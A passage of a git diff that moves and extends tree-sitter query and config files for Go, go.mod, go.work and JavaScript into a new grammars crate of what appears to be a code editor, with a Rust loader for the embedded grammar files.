])) + (short_var_declaration + left: (expression_list) + ":=" + (comment) @_comment + right: (expression_list + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ])) + (composite_literal + body: (literal_value + (keyed_element + (comment) @_comment + value: (literal_element + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ])))) + (expression_statement + (call_expression + (argument_list + (comment) @_comment + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ]))) +] + (#match? @_comment "^\\/\\*\\s*yaml\\s*\\*\\/") + ; /* yaml */ or /*yaml*/ + (#set! injection.language "yaml")) + +; INJECT XML +([ + (const_spec + name: (identifier) + "=" + (comment) @_comment + value: (expression_list + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ])) + (var_spec + name: (identifier) + "=" + (comment) @_comment + value: (expression_list + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ])) + (assignment_statement + left: (expression_list) + "=" + (comment) @_comment + right: (expression_list + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ])) + (short_var_declaration + left: (expression_list) + ":=" + (comment) @_comment + right: (expression_list + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ])) + (composite_literal + body: (literal_value + (keyed_element + (comment) @_comment + value: (literal_element + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ])))) + (expression_statement + (call_expression + (argument_list + (comment) @_comment + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ]))) +] + (#match? @_comment "^\\/\\*\\s*xml\\s*\\*\\/") + ; /* xml */ or /*xml*/ + (#set! injection.language "xml")) + +; INJECT HTML +([ + (const_spec + name: (identifier) + "=" + (comment) @_comment + value: (expression_list + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ])) + (var_spec + name: (identifier) + "=" + (comment) @_comment + value: (expression_list + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ])) + (assignment_statement + left: (expression_list) + "=" + (comment) @_comment + right: (expression_list + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ])) + (short_var_declaration + left: (expression_list) + ":=" + (comment) @_comment + right: (expression_list + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ])) + (composite_literal + body: (literal_value + (keyed_element + (comment) @_comment + value: (literal_element + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ])))) + (expression_statement + (call_expression + (argument_list + (comment) @_comment + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ]))) +] + (#match? @_comment "^\\/\\*\\s*html\\s*\\*\\/") + ; /* html */ or /*html*/ + (#set! injection.language "html")) + +; INJECT JS +([ + (const_spec + name: (identifier) + "=" + (comment) @_comment + value: (expression_list + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ])) + (var_spec + name: (identifier) + "=" + (comment) @_comment + value: (expression_list + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ])) + (assignment_statement + left: (expression_list) + "=" + (comment) @_comment + right: (expression_list + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ])) + (short_var_declaration + left: (expression_list) + ":=" + (comment) @_comment + right: (expression_list + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ])) + (composite_literal + body: (literal_value + (keyed_element + (comment) @_comment + value: (literal_element + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ])))) + (expression_statement + (call_expression + (argument_list + (comment) @_comment + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ]))) +] + (#match? @_comment "^\\/\\*\\s*js\\s*\\*\\/") + ; /* js */ or /*js*/ + (#set! injection.language "javascript")) + +; INJECT CSS +([ + (const_spec + name: (identifier) + "=" + (comment) @_comment + value: (expression_list + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ])) + (var_spec + name: (identifier) + "=" + (comment) @_comment + value: (expression_list + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ])) + (assignment_statement + left: (expression_list) + "=" + (comment) @_comment + right: (expression_list + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ])) + (short_var_declaration + left: (expression_list) + ":=" + (comment) @_comment + right: (expression_list + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ])) + (composite_literal + body: (literal_value + (keyed_element + (comment) @_comment + value: (literal_element + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ])))) + (expression_statement + (call_expression + (argument_list + (comment) @_comment + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ]))) +] + (#match? @_comment "^\\/\\*\\s*css\\s*\\*\\/") + ; /* css */ or /*css*/ + (#set! injection.language "css")) + +; INJECT LUA +([ + (const_spec + name: (identifier) + "=" + (comment) @_comment + value: (expression_list + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ])) + (var_spec + name: (identifier) + "=" + (comment) @_comment + value: (expression_list + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ])) + (assignment_statement + left: (expression_list) + "=" + (comment) @_comment + right: (expression_list + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ])) + (short_var_declaration + left: (expression_list) + ":=" + (comment) @_comment + right: (expression_list + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ])) + (composite_literal + body: (literal_value + (keyed_element + (comment) @_comment + value: (literal_element + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ])))) + (expression_statement + (call_expression + (argument_list + (comment) @_comment + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ]))) +] + (#match? @_comment "^\\/\\*\\s*lua\\s*\\*\\/") + ; /* lua */ or /*lua*/ + (#set! injection.language "lua")) + +; INJECT BASH +([ + (const_spec + name: (identifier) + "=" + (comment) @_comment + value: (expression_list + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ])) + (var_spec + name: (identifier) + "=" + (comment) @_comment + value: (expression_list + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ])) + (assignment_statement + left: (expression_list) + "=" + (comment) @_comment + right: (expression_list + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ])) + (short_var_declaration + left: (expression_list) + ":=" + (comment) @_comment + right: (expression_list + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ])) + (composite_literal + body: (literal_value + (keyed_element + (comment) @_comment + value: (literal_element + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ])))) + (expression_statement + (call_expression + (argument_list + (comment) @_comment + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ]))) +] + (#match? @_comment "^\\/\\*\\s*bash\\s*\\*\\/") + ; /* bash */ or /*bash*/ + (#set! injection.language "bash")) + +; INJECT CSV +([ + (const_spec + name: (identifier) + "=" + (comment) @_comment + value: (expression_list + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ])) + (var_spec + name: (identifier) + "=" + (comment) @_comment + value: (expression_list + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ])) + (assignment_statement + left: (expression_list) + "=" + (comment) @_comment + right: (expression_list + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ])) + (short_var_declaration + left: (expression_list) + ":=" + (comment) @_comment + right: (expression_list + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ])) + ((comment) @_comment + value: (literal_element + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ])) + (argument_list + (comment) @_comment + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ]) +] + (#match? @_comment "^\\/\\*\\s*csv\\s*\\*\\/") + ; /* csv */ or /*csv */ + (#set! injection.language "csv")) diff --git a/crates/grammars/src/go/outline.scm b/crates/grammars/src/go/outline.scm new file mode 100644 index 0000000000000000000000000000000000000000..da42904fab942635b1140b486dde0c25694147d3 --- /dev/null +++ b/crates/grammars/src/go/outline.scm @@ -0,0 +1,61 @@ +(comment) @annotation + +(type_declaration + "type" @context + [ + (type_spec + name: (_) @name) @item + ("(" + (type_spec + name: (_) @name) @item + ")") + ]) + +(function_declaration + "func" @context + name: (identifier) @name + parameters: (parameter_list + "(" + ")")) @item + +(method_declaration + "func" @context + receiver: (parameter_list + "(" @context + (parameter_declaration + name: (_) @context + type: (_) @context) + ")" @context) + name: (field_identifier) @name + parameters: (parameter_list + "(" + ")")) @item + +(const_declaration + "const" @context + (const_spec + name: (identifier) @name) @item) + +(source_file + (var_declaration + "var" @context + [ + ; The declaration may define multiple variables, and so @item is on + ; the identifier so they get distinct ranges. + (var_spec + name: (identifier) @name @item) + (var_spec_list + (var_spec + name: (identifier) @name @item)) + ])) + +(method_elem + name: (_) @name + parameters: (parameter_list + "(" @context + ")" @context)) @item + +; Fields declarations may define multiple fields, and so @item is on the +; declarator so they each get distinct ranges. +(field_declaration + name: (_) @name @item) diff --git a/crates/languages/src/go/overrides.scm b/crates/grammars/src/go/overrides.scm similarity index 99% rename from crates/languages/src/go/overrides.scm rename to crates/grammars/src/go/overrides.scm index aae1520301bbb2a04b04f930b747d290051bc9cc..7989c4271f0ec9f18a6f75315f01d13454fca7b9 100644 --- a/crates/languages/src/go/overrides.scm +++ b/crates/grammars/src/go/overrides.scm @@ -1,4 +1,5 @@ (comment) @comment.inclusive + [ (interpreted_string_literal) (raw_string_literal) diff --git a/crates/grammars/src/go/runnables.scm b/crates/grammars/src/go/runnables.scm new file mode 100644 index 0000000000000000000000000000000000000000..d00be6e1d0db4b8fd97596002099525128458a7f --- /dev/null +++ b/crates/grammars/src/go/runnables.scm @@ -0,0 +1,212 @@ +; Functions names start with `Test` +(((function_declaration + name: (_) @run + (#match? @run "^Test.*") + (#not-match? @run "^TestMain$"))) @_ + (#set! tag go-test)) + +; Suite test methods (testify/suite) +((method_declaration + receiver: (parameter_list + (parameter_declaration + type: [ + (pointer_type + (type_identifier) @_suite_name) + (type_identifier) @_suite_name + ])) + name: (field_identifier) @run @_subtest_name + (#match? @_subtest_name "^Test.*") + (#match? @_suite_name ".*Suite")) @_ + (#set! tag go-testify-suite)) + +; `go:generate` comments +(((comment) @_comment @run + (#match? @_comment "^//go:generate")) + (#set! tag go-generate)) + +; `t.Run` +(((call_expression + function: (selector_expression + field: _ @run @_name + (#eq? @_name "Run")) + arguments: (argument_list + . + [ + (interpreted_string_literal) + (raw_string_literal) + ] @_subtest_name + . + (func_literal + parameters: (parameter_list + (parameter_declaration + name: (identifier) @_param_name + type: (pointer_type + (qualified_type + package: (package_identifier) @_pkg + name: (type_identifier) @_type + (#eq? @_pkg "testing") + (#eq? @_type "T")))))) @_second_argument))) @_ + (#set! tag go-subtest)) + +; Functions names start with `Example` +(((function_declaration + name: (_) @run @_name + (#match? @_name "^Example.*"))) @_ + (#set! tag go-example)) + +; Functions names start with `Benchmark` +(((function_declaration + name: (_) @run @_name + (#match? @_name "^Benchmark.*"))) @_ + (#set! tag go-benchmark)) + +; Functions names start with `Fuzz` +(((function_declaration + name: (_) @run @_name + (#match? @_name "^Fuzz"))) @_ + (#set! tag go-fuzz)) + +; go run +(((function_declaration + name: (_) @run + (#eq? @run "main"))) @_ + (#set! tag go-main)) + +; Table test cases - slice and map with explicit variable +((short_var_declaration + left: (expression_list + (identifier) @_collection_var) + right: (expression_list + (composite_literal + type: [ + (slice_type) + (map_type + key: (type_identifier) @_key_type + (#eq? @_key_type "string")) + ] + body: (literal_value + [ + (literal_element + (literal_value + (keyed_element + (literal_element + (identifier) @_field_name) + (literal_element + [ + (interpreted_string_literal) @run @_table_test_case_name + (raw_string_literal) @run @_table_test_case_name + ])))) + (keyed_element + (literal_element + [ + (interpreted_string_literal) @run @_table_test_case_name + (raw_string_literal) @run @_table_test_case_name + ])) + ])))) + (for_statement + (range_clause + left: (expression_list + [ + ((identifier) + (identifier) @_loop_var_inner) + (identifier) @_loop_var_outer + ]) + right: (identifier) @_range_var + (#eq? @_range_var @_collection_var)) + body: (block + (statement_list + (expression_statement + (call_expression + function: (selector_expression + operand: (identifier) + field: (field_identifier) @_run_method + (#eq? @_run_method "Run")) + arguments: (argument_list + . + [ + (selector_expression + operand: (identifier) @_tc_var + (#eq? @_tc_var @_loop_var_inner) + field: (field_identifier) @_field_check + (#eq? @_field_check @_field_name)) + (identifier) @_arg_var + (#eq? @_arg_var @_loop_var_outer) + ] + . + (func_literal + parameters: (parameter_list + (parameter_declaration + type: (pointer_type + (qualified_type + package: (package_identifier) @_pkg + name: (type_identifier) @_type + (#eq? @_pkg "testing") + (#eq? @_type "T")))))))))))) @_ + (#set! tag go-table-test-case)) + +; Table test cases - slice and map declared right inside the loop without +; explicit variable +((for_statement + (range_clause + left: (expression_list + [ + ((identifier) + (identifier) @_loop_var_inner) + (identifier) @_loop_var_outer + ]) + right: (composite_literal + type: [ + (slice_type) + (map_type + key: (type_identifier) @_key_type + (#eq? @_key_type "string")) + ] + body: (literal_value + [ + (literal_element + (literal_value + (keyed_element + (literal_element + (identifier) @_field_name) + (literal_element + [ + (interpreted_string_literal) @run @_table_test_case_name + (raw_string_literal) @run @_table_test_case_name + ])))) + (keyed_element + (literal_element + [ + (interpreted_string_literal) @run @_table_test_case_name + (raw_string_literal) @run @_table_test_case_name + ])) + ]))) + body: (block + (statement_list + (expression_statement + (call_expression + function: (selector_expression + operand: (identifier) + field: (field_identifier) @_run_method + (#eq? @_run_method "Run")) + arguments: (argument_list + . + [ + (selector_expression + operand: (identifier) @_tc_var + (#eq? @_tc_var @_loop_var_inner) + field: (field_identifier) @_field_check + (#eq? @_field_check @_field_name)) + (identifier) @_arg_var + (#eq? @_arg_var @_loop_var_outer) + ] + . + (func_literal + parameters: (parameter_list + (parameter_declaration + type: (pointer_type + (qualified_type + package: (package_identifier) @_pkg + name: (type_identifier) @_type + (#eq? @_pkg "testing") + (#eq? @_type "T")))))))))))) @_ + (#set! tag go-table-test-case-without-explicit-variable)) diff --git a/crates/grammars/src/go/semantic_token_rules.json b/crates/grammars/src/go/semantic_token_rules.json new file mode 100644 index 0000000000000000000000000000000000000000..612076463c25cf9219589aa83160e537cd743061 --- /dev/null +++ b/crates/grammars/src/go/semantic_token_rules.json @@ -0,0 +1,12 @@ +[ + { + "token_type": "variable", + "token_modifiers": ["readonly"], + "style": ["constant"] + }, + { + "token_type": "string", + "token_modifiers": ["format"], + "style": ["string.special"] + } +] diff --git a/crates/grammars/src/go/textobjects.scm b/crates/grammars/src/go/textobjects.scm new file mode 100644 index 0000000000000000000000000000000000000000..4e0a78991a4b1ca49f48b0c1c73c51ff5e002f50 --- /dev/null +++ b/crates/grammars/src/go/textobjects.scm @@ -0,0 +1,28 @@ +(function_declaration + body: (_ + "{" + (_)* @function.inside + "}")) @function.around + +(method_declaration + body: (_ + "{" + (_)* @function.inside + "}")) @function.around + +(type_declaration + (type_spec + (struct_type + (field_declaration_list + ("{" + (_)* @class.inside + "}")?)))) @class.around + +(type_declaration + (type_spec + (interface_type + (_)* @class.inside))) @class.around + +(type_declaration) @class.around + +(comment)+ @comment.around diff --git a/crates/languages/src/gomod/config.toml b/crates/grammars/src/gomod/config.toml similarity index 88% rename from crates/languages/src/gomod/config.toml rename to crates/grammars/src/gomod/config.toml index e70c9358bfc6f467b69897fa6d20dd9ae0082f9a..d151db961106591c07850034f669304db7edb650 100644 --- a/crates/languages/src/gomod/config.toml +++ b/crates/grammars/src/gomod/config.toml @@ -2,7 +2,7 @@ name = "Go Mod" code_fence_block_name = "go.mod" grammar = "gomod" path_suffixes = ["mod"] -line_comments = ["//"] +line_comments = ["// "] autoclose_before = ")" brackets = [ { start = "(", end = ")", close = true, newline = true} diff --git a/crates/languages/src/gomod/highlights.scm b/crates/grammars/src/gomod/highlights.scm similarity index 85% rename from crates/languages/src/gomod/highlights.scm rename to crates/grammars/src/gomod/highlights.scm index 03be1b5957160820033d93b35b39d4329b7890a6..f026035cb126382274e783ece2515148b6cffd73 100644 --- a/crates/languages/src/gomod/highlights.scm +++ b/crates/grammars/src/gomod/highlights.scm @@ -15,6 +15,6 @@ (comment) @comment [ -(version) -(go_version) + (version) + (go_version) ] @string diff --git a/crates/grammars/src/gomod/injections.scm b/crates/grammars/src/gomod/injections.scm new file mode 100644 index 0000000000000000000000000000000000000000..2f0e58eb6431515b86b6042e5828263341513e99 --- /dev/null +++ b/crates/grammars/src/gomod/injections.scm @@ -0,0 +1,2 @@ +((comment) @injection.content + (#set! injection.language "comment")) diff --git a/crates/grammars/src/gomod/structure.scm b/crates/grammars/src/gomod/structure.scm new file mode 100644 index 0000000000000000000000000000000000000000..2da1b0d5e643d2235b9555c15cfe3624f14758f2 --- /dev/null +++ b/crates/grammars/src/gomod/structure.scm @@ -0,0 +1,29 @@ +(require_directive + "require" @structure.anchor + "(" @structure.open + ")" @structure.close) + +(exclude_directive + "exclude" @structure.anchor + "(" @structure.open + ")" @structure.close) + +(module_directive + "module" @structure.anchor + "(" @structure.open + ")" @structure.close) + +(replace_directive + "replace" @structure.anchor + "(" @structure.open + ")" @structure.close) + +(retract_directive + "retract" @structure.anchor + "(" @structure.open + ")" @structure.close) + +(ignore_directive + "ignore" @structure.anchor + "(" @structure.open + ")" @structure.close) diff --git a/crates/languages/src/gowork/config.toml b/crates/grammars/src/gowork/config.toml similarity index 88% rename from crates/languages/src/gowork/config.toml rename to crates/grammars/src/gowork/config.toml index 68beb073ab64df4761bf3f87a88f28a0608656f7..90e62f0cf102306b258e9efd56bb9ae9838f0f27 100644 --- a/crates/languages/src/gowork/config.toml +++ b/crates/grammars/src/gowork/config.toml @@ -2,7 +2,7 @@ name = "Go Work" code_fence_block_name = "gowork" grammar = "gowork" path_suffixes = ["work"] -line_comments = ["//"] +line_comments = ["// "] autoclose_before = ")" brackets = [ { start = "(", end = ")", close = true, newline = true} diff --git a/crates/languages/src/gowork/highlights.scm b/crates/grammars/src/gowork/highlights.scm similarity index 76% rename from crates/languages/src/gowork/highlights.scm rename to crates/grammars/src/gowork/highlights.scm index 9c84bcc4496394817190a86fa8cd4995b39475a2..b9d3d42e630c5c4f4eb877a330a15371ceb4d96a 100644 --- a/crates/languages/src/gowork/highlights.scm +++ b/crates/grammars/src/gowork/highlights.scm @@ -9,6 +9,6 @@ (comment) @comment [ -(version) -(go_version) + (version) + (go_version) ] @string diff --git a/crates/grammars/src/gowork/injections.scm b/crates/grammars/src/gowork/injections.scm new file mode 100644 index 0000000000000000000000000000000000000000..2f0e58eb6431515b86b6042e5828263341513e99 --- /dev/null +++ b/crates/grammars/src/gowork/injections.scm @@ -0,0 +1,2 @@ +((comment) @injection.content + (#set! injection.language "comment")) diff --git a/crates/grammars/src/grammars.rs b/crates/grammars/src/grammars.rs new file mode 100644 index 0000000000000000000000000000000000000000..00d6e6281c45b10a5dcfbd188b5848c63cc0cd75 --- /dev/null +++ b/crates/grammars/src/grammars.rs @@ -0,0 +1,108 @@ +use anyhow::Context as _; +use language_core::{LanguageConfig, LanguageQueries, QUERY_FILENAME_PREFIXES}; +use rust_embed::RustEmbed; +use util::asset_str; + +#[derive(RustEmbed)] +#[folder = "src/"] +#[exclude = "*.rs"] +struct GrammarDir; + +/// Register all built-in native tree-sitter grammars with the provided registration function. +/// +/// Each grammar is registered as a `(&str, tree_sitter_language::LanguageFn)` pair. +/// This must be called before loading language configs/queries. +#[cfg(feature = "load-grammars")] +pub fn native_grammars() -> Vec<(&'static str, tree_sitter::Language)> { + vec![ + ("bash", tree_sitter_bash::LANGUAGE.into()), + ("c", tree_sitter_c::LANGUAGE.into()), + ("cpp", tree_sitter_cpp::LANGUAGE.into()), + ("css", tree_sitter_css::LANGUAGE.into()), + ("diff", tree_sitter_diff::LANGUAGE.into()), + ("go", tree_sitter_go::LANGUAGE.into()), + ("gomod", tree_sitter_go_mod::LANGUAGE.into()), + ("gowork", tree_sitter_gowork::LANGUAGE.into()), + ("jsdoc", tree_sitter_jsdoc::LANGUAGE.into()), + ("json", tree_sitter_json::LANGUAGE.into()), + ("jsonc", tree_sitter_json::LANGUAGE.into()), + ("markdown", tree_sitter_md::LANGUAGE.into()), + ("markdown-inline", tree_sitter_md::INLINE_LANGUAGE.into()), + ("python", tree_sitter_python::LANGUAGE.into()), + ("regex", tree_sitter_regex::LANGUAGE.into()), + ("rust", tree_sitter_rust::LANGUAGE.into()), + ("tsx", tree_sitter_typescript::LANGUAGE_TSX.into()), + ( + "typescript", + tree_sitter_typescript::LANGUAGE_TYPESCRIPT.into(), + ), + ("yaml", tree_sitter_yaml::LANGUAGE.into()), + ("gitcommit", tree_sitter_gitcommit::LANGUAGE.into()), + ] +} + +/// Load and parse the `config.toml` for a given language name. +pub fn load_config(name: &str) -> LanguageConfig { + let config_toml = String::from_utf8( + GrammarDir::get(&format!("{}/config.toml", name)) + .unwrap_or_else(|| panic!("missing config for language {:?}", name)) + .data + .to_vec(), + ) + .unwrap(); + + let config: LanguageConfig = ::toml::from_str(&config_toml) + .with_context(|| format!("failed to load config.toml for language {name:?}")) + .unwrap(); + + config +} + +/// Load and parse the `config.toml` for a given language name, stripping fields +/// that require grammar support when grammars are not loaded. +pub fn load_config_for_feature(name: &str, grammars_loaded: bool) -> LanguageConfig { + let config = load_config(name); + + if grammars_loaded { + config + } else { + LanguageConfig { + name: config.name, + matcher: config.matcher, + jsx_tag_auto_close: config.jsx_tag_auto_close, + ..Default::default() + } + } +} + +/// Get a raw embedded file by path (relative to `src/`). +/// +/// Returns the file data as bytes, or `None` if the file does not exist. +pub fn get_file(path: &str) -> Option { + GrammarDir::get(path) +} + +/// Load all `.scm` query files for a given language name into a `LanguageQueries`. +/// +/// Multiple `.scm` files with the same prefix (e.g. `highlights.scm` and +/// `highlights_extra.scm`) are concatenated together with their contents appended. +pub fn load_queries(name: &str) -> LanguageQueries { + let mut result = LanguageQueries::default(); + for path in GrammarDir::iter() { + if let Some(remainder) = path.strip_prefix(name).and_then(|p| p.strip_prefix('/')) { + if !remainder.ends_with(".scm") { + continue; + } + for (prefix, query) in QUERY_FILENAME_PREFIXES { + if remainder.starts_with(prefix) { + let contents = asset_str::(path.as_ref()); + match query(&mut result) { + None => *query(&mut result) = Some(contents), + Some(existing) => existing.to_mut().push_str(contents.as_ref()), + } + } + } + } + } + result +} diff --git a/crates/grammars/src/javascript/brackets.scm b/crates/grammars/src/javascript/brackets.scm new file mode 100644 index 0000000000000000000000000000000000000000..69acbcd614e440d8e8e2010f1677e52cb651e15e --- /dev/null +++ b/crates/grammars/src/javascript/brackets.scm @@ -0,0 +1,29 @@ +("(" @open + ")" @close) + +("[" @open + "]" @close) + +("{" @open + "}" @close) + +("<" @open + ">" @close) + +("<" @open + "/>" @close) + +("" @close) + +(("\"" @open + "\"" @close) + (#set! rainbow.exclude)) + +(("'" @open + "'" @close) + (#set! rainbow.exclude)) + +(("`" @open + "`" @close) + (#set! rainbow.exclude)) diff --git a/crates/languages/src/javascript/config.toml b/crates/grammars/src/javascript/config.toml similarity index 97% rename from crates/languages/src/javascript/config.toml rename to crates/grammars/src/javascript/config.toml index 265f362ce4b655371471649c03c5a4a201da320c..118024494a7b8f98bcff9354fd3d27f4fc1dcfc4 100644 --- a/crates/languages/src/javascript/config.toml +++ b/crates/grammars/src/javascript/config.toml @@ -1,6 +1,7 @@ name = "JavaScript" grammar = "tsx" path_suffixes = ["js", "jsx", "mjs", "cjs"] +modeline_aliases = ["js", "js2"] # [/ ] is so we match "env node" or "/node" but not "ts-node" first_line_pattern = '^#!.*\b(?:[/ ]node|deno run.*--ext[= ]js)\b' line_comments = ["// "] @@ -23,7 +24,6 @@ tab_size = 2 scope_opt_in_language_servers = ["tailwindcss-language-server", "emmet-language-server"] prettier_parser_name = "babel" debuggers = ["JavaScript"] -import_path_strip_regex = "(?:/index)?\\.[jt]s$" [jsx_tag_auto_close] open_tag_node_name = "jsx_opening_element" diff --git a/crates/grammars/src/javascript/debugger.scm b/crates/grammars/src/javascript/debugger.scm new file mode 100644 index 0000000000000000000000000000000000000000..8f384fd8ad9e07fea89972464e64b905086bf580 --- /dev/null +++ b/crates/grammars/src/javascript/debugger.scm @@ -0,0 +1,51 @@ +(lexical_declaration + (variable_declarator + name: (identifier) @debug-variable)) + +(for_in_statement + left: (identifier) @debug-variable) + +(for_statement + initializer: (lexical_declaration + (variable_declarator + name: (identifier) @debug-variable))) + +(binary_expression + left: (identifier) @debug-variable + (#not-match? @debug-variable "^[A-Z]")) + +(binary_expression + right: (identifier) @debug-variable + (#not-match? @debug-variable "^[A-Z]")) + +(unary_expression + argument: (identifier) @debug-variable + (#not-match? @debug-variable "^[A-Z]")) + +(update_expression + argument: (identifier) @debug-variable + (#not-match? @debug-variable "^[A-Z]")) + +(return_statement + (identifier) @debug-variable + (#not-match? @debug-variable "^[A-Z]")) + +(parenthesized_expression + (identifier) @debug-variable + (#not-match? @debug-variable "^[A-Z]")) + +(array + (identifier) @debug-variable + (#not-match? @debug-variable "^[A-Z]")) + +(pair + value: (identifier) @debug-variable + (#not-match? @debug-variable "^[A-Z]")) + +(member_expression + object: (identifier) @debug-variable + (#not-match? @debug-variable "^[A-Z]")) + +(statement_block) @debug-scope + +(program) @debug-scope diff --git a/crates/languages/src/javascript/highlights.scm b/crates/grammars/src/javascript/highlights.scm similarity index 61% rename from crates/languages/src/javascript/highlights.scm rename to crates/grammars/src/javascript/highlights.scm index 5fb31ce100b5884d99d3e941ce6fb67b69ff2cfd..f6354dd3a016f544e5be1616c3dfb12144855775 100644 --- a/crates/languages/src/javascript/highlights.scm +++ b/crates/grammars/src/javascript/highlights.scm @@ -1,56 +1,33 @@ ; Variables - (identifier) @variable (call_expression function: (member_expression object: (identifier) @type - (#any-of? - @type - "Promise" - "Array" - "Object" - "Map" - "Set" - "WeakMap" - "WeakSet" - "Date" - "Error" - "TypeError" - "RangeError" - "SyntaxError" - "ReferenceError" - "EvalError" - "URIError" - "RegExp" - "Function" - "Number" - "String" - "Boolean" - "Symbol" - "BigInt" - "Proxy" - "ArrayBuffer" - "DataView" - ) - ) -) + (#any-of? @type + "Promise" "Array" "Object" "Map" "Set" "WeakMap" "WeakSet" "Date" "Error" "TypeError" + "RangeError" "SyntaxError" "ReferenceError" "EvalError" "URIError" "RegExp" "Function" + "Number" "String" "Boolean" "Symbol" "BigInt" "Proxy" "ArrayBuffer" "DataView"))) ; Properties - (property_identifier) @property + (shorthand_property_identifier) @property + (shorthand_property_identifier_pattern) @property + (private_property_identifier) @property ; Function and method calls - (call_expression function: (identifier) @function) (call_expression function: (member_expression - property: [(property_identifier) (private_property_identifier)] @function.method)) + property: [ + (property_identifier) + (private_property_identifier) + ] @function.method)) (new_expression constructor: (identifier) @type) @@ -59,36 +36,58 @@ module: (identifier) @type) ; Function and method definitions - (function_expression name: (identifier) @function) + (function_declaration name: (identifier) @function) + (method_definition - name: [(property_identifier) (private_property_identifier)] @function.method) + name: [ + (property_identifier) + (private_property_identifier) + ] @function.method) + (method_definition - name: (property_identifier) @constructor - (#eq? @constructor "constructor")) + name: (property_identifier) @constructor + (#eq? @constructor "constructor")) (pair - key: [(property_identifier) (private_property_identifier)] @function.method - value: [(function_expression) (arrow_function)]) + key: [ + (property_identifier) + (private_property_identifier) + ] @function.method + value: [ + (function_expression) + (arrow_function) + ]) (assignment_expression left: (member_expression - property: 